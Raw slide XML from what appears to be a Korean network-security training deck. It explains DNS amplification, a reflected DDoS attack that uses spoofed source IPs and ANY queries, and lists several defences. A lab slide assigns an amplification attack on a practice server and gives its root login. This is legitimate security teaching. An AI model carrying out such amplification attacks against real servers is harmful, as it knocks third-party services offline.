                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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097" name="_x197186992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F798C4-9547-4C81-837C-47E9F30215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984" y="943233"/>
            <a:ext cx="5400675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_x197192032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4955B429-37DD-42D9-9F37-B585ADCC38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984" y="2431868"/>
            <a:ext cx="5400675" cy="2320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36A681B-7B62-4DF6-B54B-133E044543EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="_x197192112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25F164B-9269-498B-B06F-55D47B03D4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3524" y="943233"/>
            <a:ext cx="3946525" cy="49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1017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E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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쿼리의 타입</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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106A686F-8AAA-433A-910E-08D55BE48F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321" y="2017350"/>
            <a:ext cx="4791075" cy="336232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692509E1-0514-4519-93EE-036E3E468D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1277" y="2036400"/>
            <a:ext cx="5400675" cy="3343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9934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E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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증폭 공격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(DNS Amplification)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C31125-175B-41E5-8957-CB9F98BCE6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971" y="2269671"/>
            <a:ext cx="4751547" cy="3266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9374DDD-7E51-4429-84D0-B1ED0D28412F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772150" y="2204357"/>
            <a:ext cx="5821587" cy="4193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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 이용한 트래픽 증폭 공격이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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출발지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변조를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>통해 공격지로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>response data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 트래픽을 향하게 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>질의에 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인증 절차가 없기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>때문에 변조가 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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마치 거울에 반사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>하듯이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 공격 하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DRDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>종류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이 과정에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타입의 쿼리를 이용하여 트래픽이 증폭 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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공격자 입장에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, Open DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 모두 좀비 피씨인 셈으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>효율적인 공격이 가능하다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620313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E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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증폭 공격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(DNS Amplification)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C31125-175B-41E5-8957-CB9F98BCE6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971" y="2269671"/>
            <a:ext cx="4751547" cy="3266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9374DDD-7E51-4429-84D0-B1ED0D28412F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772150" y="2029898"/>
            <a:ext cx="5821587" cy="4609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방어방법은 다양하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버에서 재귀를 할 수 없도록 설정한다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>도메인 정보가 없는 질의에 대해 응답을 못 할 수도 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>resolve.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일에 외부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>등록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/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ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리를 못하게 설정한다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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 변조 필터링 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(syn-cookie mechanism) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>보안장비를 배치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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방화벽 설정을 통해 특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이상의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>응답을 차단한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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매 초마다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리의 제한을 둔다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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내부 사용자의 주소만 재귀 쿼리를 허용한다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535429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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– DNS Amplification</a:t>
            </a:r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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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DNS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증폭 공격이 가능한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DNS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서버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(10.10.1.101)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를 발견하였다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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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이를 이용하여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DNS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증폭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DoS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공격을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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수행하시오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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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도메인은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example.com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을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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사용하시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / toor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
